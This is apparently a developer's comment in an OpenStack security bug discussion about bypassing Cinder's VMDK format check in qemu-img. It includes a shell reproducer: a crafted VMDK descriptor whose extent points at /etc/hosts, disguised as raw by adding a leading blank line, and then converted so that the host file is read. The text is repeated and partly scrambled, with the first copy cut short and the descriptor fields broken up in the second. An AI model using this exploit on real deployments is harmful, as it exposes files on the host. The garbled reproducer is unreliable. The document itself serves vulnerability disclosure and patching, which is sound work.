Third, in fetch_to_volume_format, we first check the VMDK createType if qemu-img info detects a VMDK, but we call the convert with the format declared in the image metadata.
Importantly, I was able to trick qemu-img info into detecting a "raw" image than can actually be converted from VMDK to raw by simply adding an empty line at the beginning of the file, thus (if I understand correctly) bypassing the check entirely.
Here's a short reproducer, note the empty line before # Disk DescriptorFile :
cat > test.raw << EOF
# Disk DescriptorFile
version=1
CID=86cc8022
parentCID=ffffffff
createType="monolithicFlat"
qemu-img info test.raw
image: test.raw
file format: raw
virtual size: 512 B (512 bytes)
disk size: 4 KiB
qemu-img convert -f vmdk -O raw test.raw hacked.raw
I'll look again at the nova patch to make sure we account for that funny discovery there too.
About glance, I think we should also patch it as part of this effort, even though it's not as bad given the fact the exploit is unavailable by default.
About Cinder, I think we should put the check_vmdk_format as close as possible the call to convert.
First, I think we may be missing some convert_images. I cannot test it, but I have come across this where we seem to convert an image into a volume directly: https:/ /opendev. org/openstack/ cinder/ src/branch/ master/ cinder/ volume/ drivers/ netapp/ dataontap/ nfs_base. py#L767
Second, I noted that, in the case of AMI image format, we let qemu-img convert detect the real format of the image: /opendev. org/openstack/ cinder/ src/branch/ master/ cinder/ image/image_ utils.py# L277
https:/
I think this is caught as part of the proposed patch, but there could be similar constructions elsewhere.
Third, in fetch_to_ volume_ format, we first check the VMDK createType if qemu-img info detects a VMDK, but we call the convert with the format declared in the image metadata.
Importantly, I was able to trick qemu-img info into detecting a "raw" image than can actually be converted from VMDK to raw by simply adding an empty line at the beginning of the file, thus (if I understand correctly) bypassing the check entirely.
Here's a short reproducer, note the empty line before # Disk DescriptorFile :
cat > test.raw << EOF
# Disk DescriptorFile "monolithicFlat "
version=1
CID=86cc8022
parentCID=ffffffff
createType=
# Extent description
RW 2048 FLAT "/etc/hosts" 0
# The Disk Data Base
#DDB
ddb.virtualHWVe rsion = "4" cylinders = "2" sectors = "63"
ddb.geometry.
ddb.geometry.heads = "16"
ddb.geometry.
ddb.adapterType = "ide"
EOF
qemu-img info test.raw
image: test.raw
file format: raw
virtual size: 512 B (512 bytes)
disk size: 4 KiB
qemu-img convert -f vmdk -O raw test.raw hacked.raw
I'll look again at the nova patch to make sure we account for that funny discovery there too.
About glance, I think we should also patch it as part of this effort, even though it's not as bad given the fact the exploit is unavailable by default.